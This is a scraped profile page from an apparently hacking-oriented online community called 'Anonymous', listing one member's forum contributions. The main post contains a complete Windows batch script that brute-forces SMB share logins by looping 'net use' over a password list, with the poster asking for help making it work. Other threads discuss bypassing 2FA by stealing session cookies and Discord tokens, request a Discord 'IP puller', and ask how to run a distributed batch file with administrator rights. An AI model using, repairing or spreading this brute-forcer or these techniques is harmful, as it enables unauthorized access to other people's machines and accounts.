Activity
Mon
Wed
Fri
Sun
Oct
Nov
Dec
Jan
Feb
Mar
Apr
May
Jun
Jul
Aug
Sep
What is this?
Less
More

Memberships

Anonymous

Public • 2k • Free

8 contributions to Anonymous
SMB
hi guys, I was trying the SMB bruteforce, only that every time I use it it tells me that the password was not found, but I'm sure I put it on the passlist and that it's right, some help? here che source: REM SETUP @echo off title SMB Bruteforce - by Sam1093k mode con cols=120 lines=30 chcp 65001 >nul cls CALL :LOGO pause >nul REM LOGO :LOGO echo. echo. echo ██████ ███▄ ▄███▓ ▄▄▄▄ echo ▒██ ▒ ▓██▒▀█▀ ██▒▓█████▄ echo ░ ▓██▄ ▓██ ▓██░▒██▒ ▄██ echo ▒ ██▒▒██ ▒██ ▒██░█▀ echo ▒██████▒▒▒██▒ ░██▒░▓█ ▀█▓ echo ▒ ▒▓▒ ▒ ░░ ▒░ ░ ░░▒▓███▀▒ echo ░ ░▒ ░ ░░ ░ ░▒░▒ ░ echo ░ ░ ░ ░ ░ ░ ░ echo ░ ░ ░ echo ░ echo. echo. color A set /p ip="Enter IP Address: " set /p user="Enter Username: " set /p wordlist="Enter Password List: " set /a count=1 for /f %%a in (%wordlist%) do ( set pass=%%a call :attempt ) echo Password not Found :( pause exit :success echo. echo Password Found! %pass% net use \\%ip% /d /y >nul 2>&1 pause exit :attempt net use \\%ip% /user:%user% %pass% >nul 2>&1 echo [ATTEMPT %count%] [%pass%] set /a count=%count%+1 if %errorlevel% EQU 0 goto success
0
18
New comment 5d ago
1 like • 5d
Imma wait for the xor 1st guy
1 like • 7d
it's for members of anonymous 2.0 only
how do hackers bypass 2FA
just a question that I haven't figured out yet. When I was hacked, hackers just bypassed my email 2FA and I'm wondering how they do it? Gmail has a very cool 2FA system which requires your phone so idk how they do it.
0
5
New comment 8d ago
0 likes • 10d
hackers steal ur cookies, and something like a token, for example if somebody steals ur discord token, they don't need 2FA to login, so sucks to suck
0 likes • 9d
@Alkes Heker no problem
Looking for a discord ip puller
maybe a user id to ip puller, if not anything else would work
0
18
New comment 5d ago
1 like • 10d
@Xor Ist search up ntts on YT
0 likes • 9d
@Uplane Is epic ntts stands for no text to speech
What is the CMD/Batch command to run something as administrator?
I've found this command: runas /user:Administrator <executable path> But it only works if the built-in Administrator account has a password. Since I want to distribute the batch file without requiring users to set a password, this solution isn't ideal.
0
10
New comment 6d ago
0 likes • 10d
@Nethuja Gunawardane you need to have administrator privilege beforehand to run the command successfully
0 likes • 9d
@Nethuja Gunawardane true, but it doesn't work if you don't have admin rights, better thing is to boot ur pc into safe mode and then open cmd there in advanced troubleshooting options, it is good if you have the bitlocker code for ur drives, and then there, the cmd will be adminstrator by default
1-8 of 8
Jit Trippin
2
15points to level up
@jit-trippin-1218
Learning...

Active 1h ago
Joined Sep 8, 2024
powered by